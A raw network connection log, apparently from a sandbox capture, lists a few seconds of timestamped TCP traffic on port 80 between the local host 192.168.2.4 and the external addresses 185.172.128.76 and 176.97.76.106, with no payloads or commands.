Apr 27, 2024 02:19:36.345165968 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:36.345256090 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:36.345274925 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:36.345345020 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:36.345442057 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:36.348184109 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:36.348268986 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:36.358015060 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:36.358125925 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:36.358479977 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:36.358623028 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:36.367394924 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:36.367472887 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:36.367474079 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:36.367499113 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:36.367522955 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:36.367536068 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:36.367592096 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:36.367638111 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:36.469207048 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:36.469379902 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:36.469491005 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:36.469505072 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:36.469552994 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:36.469553947 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:36.469610929 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:36.512351990 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:36.516700983 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:36.516797066 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:36.516871929 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:36.516871929 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:36.516922951 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:36.516979933 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:36.519383907 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:36.519440889 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:36.529128075 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:36.529192924 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:36.529584885 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:36.529639959 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:36.562972069 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:36.562987089 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:36.563046932 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:36.664700985 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:36.664716005 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:36.664766073 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:36.664783001 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:36.664797068 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:36.664844036 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:36.688386917 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:36.688425064 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:36.688463926 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:36.688483953 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:36.688502073 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:36.688546896 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:36.690903902 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:36.690987110 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:36.691045046 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:36.691112041 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:36.700839996 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:36.700902939 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:36.758258104 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:36.758274078 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:36.758285999 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:36.758294106 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:36.758347034 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:36.859605074 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:36.859678984 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:36.859692097 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:36.859775066 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:36.859867096 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:36.859944105 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:36.859975100 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:36.860002041 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:36.860065937 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:36.860076904 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:36.860150099 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:36.860165119 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:36.860249996 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:36.862795115 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:36.862875938 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:36.873521090 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:36.873605967 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:36.873672962 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:36.873744011 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:36.953666925 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:36.953681946 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:36.953701019 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:36.953712940 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:36.953809977 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:37.032500029 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:37.032581091 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:37.032593012 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:37.032598019 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:37.032638073 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:37.032661915 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:37.032718897 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:37.034215927 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:37.034282923 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:37.044995070 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:37.045070887 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:37.045095921 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:37.045243025 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:37.054749012 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:37.054800034 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:37.054866076 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:37.054869890 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:37.054934025 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:37.055035114 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:37.149282932 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:37.149378061 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:37.149395943 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:37.149437904 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:37.149478912 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:37.149538994 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:37.149581909 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:37.203794003 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:37.203902006 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:37.203947067 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:37.203994989 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:37.203998089 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:37.204040051 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:37.205444098 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:37.205502033 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:37.205504894 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:37.205555916 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:37.216258049 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:37.216325998 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:37.216403008 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:37.216449022 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:37.249680042 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:37.249746084 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:37.249749899 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:37.249839067 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:37.249900103 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:37.249912024 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:37.324595928 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:37.344937086 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:37.345032930 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:37.345096111 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:37.345109940 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:37.345226049 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:37.374392986 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:37.374505043 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:37.374629021 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:37.374644041 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:37.374655962 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:37.374685049 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:37.374715090 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:37.375530005 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:37.375592947 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:37.386526108 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:37.386583090 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:37.386686087 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:37.386703014 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:37.386737108 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:37.386750937 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:37.444885015 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:37.444921970 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:37.444962978 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:37.445003986 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:37.445010900 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:37.445070028 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:37.519934893 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:37.539851904 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:37.539865971 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:37.539876938 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:37.539933920 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:37.540014029 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:37.544707060 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:37.544794083 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:37.544841051 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:37.544908047 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:37.544929028 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:37.545006990 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:37.545654058 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:37.545754910 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:37.545763969 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:37.545811892 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:37.556781054 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:37.556860924 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:37.556955099 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:37.557053089 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:37.557163000 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:37.557245016 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:37.590218067 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:37.638993025 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:37.639031887 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:37.639141083 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:37.639148951 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:37.639214039 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:37.639233112 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:37.639275074 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:37.684115887 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:37.717608929 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:37.717626095 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:37.717751980 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:37.717752934 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:37.717766047 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:37.717813015 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:37.717864990 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:37.718115091 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:37.718215942 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:37.718252897 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:37.718332052 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:37.728975058 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:37.729024887 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:37.729139090 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:37.729151964 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:37.729197025 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:37.729197025 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:37.736038923 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:37.736197948 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:37.736263990 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:37.736313105 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:37.736537933 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:37.736577034 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:37.784476042 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:37.833427906 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:37.833471060 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:37.833554029 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:37.833642006 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:37.833656073 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:37.833689928 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:37.887090921 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:37.887770891 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:37.887792110 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:37.887864113 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:37.887867928 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:37.887881994 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:37.887893915 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:37.887912989 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:37.887932062 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:37.888499975 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:37.888545036 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:37.888549089 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:37.888590097 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:37.899317026 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:37.899368048 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:37.899542093 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:37.899557114 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:37.899591923 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:37.899605989 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:37.931808949 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:37.931823015 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:37.931847095 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:37.931866884 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:37.931883097 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:37.931885958 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:37.931914091 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:37.931940079 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:37.931977987 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:38.031709909 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:38.031871080 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:38.031908035 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:38.032027960 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:38.032041073 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:38.032087088 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:38.061400890 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:38.061455965 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:38.061561108 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:38.061605930 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:38.061748028 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:38.061760902 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:38.061794043 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:38.062338114 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:38.062381029 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:38.062511921 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:38.062556028 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:38.070060015 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:38.070071936 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:38.070106983 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:38.070130110 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:38.070379972 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:38.070421934 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:38.070434093 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:38.070485115 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:38.082834005 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:38.127312899 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:38.127358913 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:38.127401114 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:38.127479076 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:38.127532005 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:38.127603054 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:38.127677917 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:38.127717018 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:38.127764940 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:38.168313980 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:38.226243973 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:38.226285934 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:38.226331949 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:38.226422071 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:38.226505995 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:38.226541996 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:38.231673956 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:38.231723070 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:38.231884956 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:38.231928110 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:38.231969118 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:38.232011080 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:38.232506037 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:38.232553005 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:38.232624054 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:38.232669115 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:38.240601063 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:38.240650892 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:38.240751028 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:38.240792990 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:38.240820885 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:38.240859985 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:38.240899086 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:38.240942001 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:38.240978956 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:38.241019964 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:38.322838068 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:38.322933912 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:38.323056936 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:38.323064089 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:38.323156118 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:38.323198080 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:38.323216915 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:38.323328018 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:38.323368073 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:38.323389053 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:38.364507914 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:38.364578009 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:38.404020071 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:38.404073954 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:38.404153109 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:38.404205084 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:38.404222965 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:38.404263020 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:38.404331923 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:38.404371023 CEST	49733	80	192.168.2.4	185.172.128.76
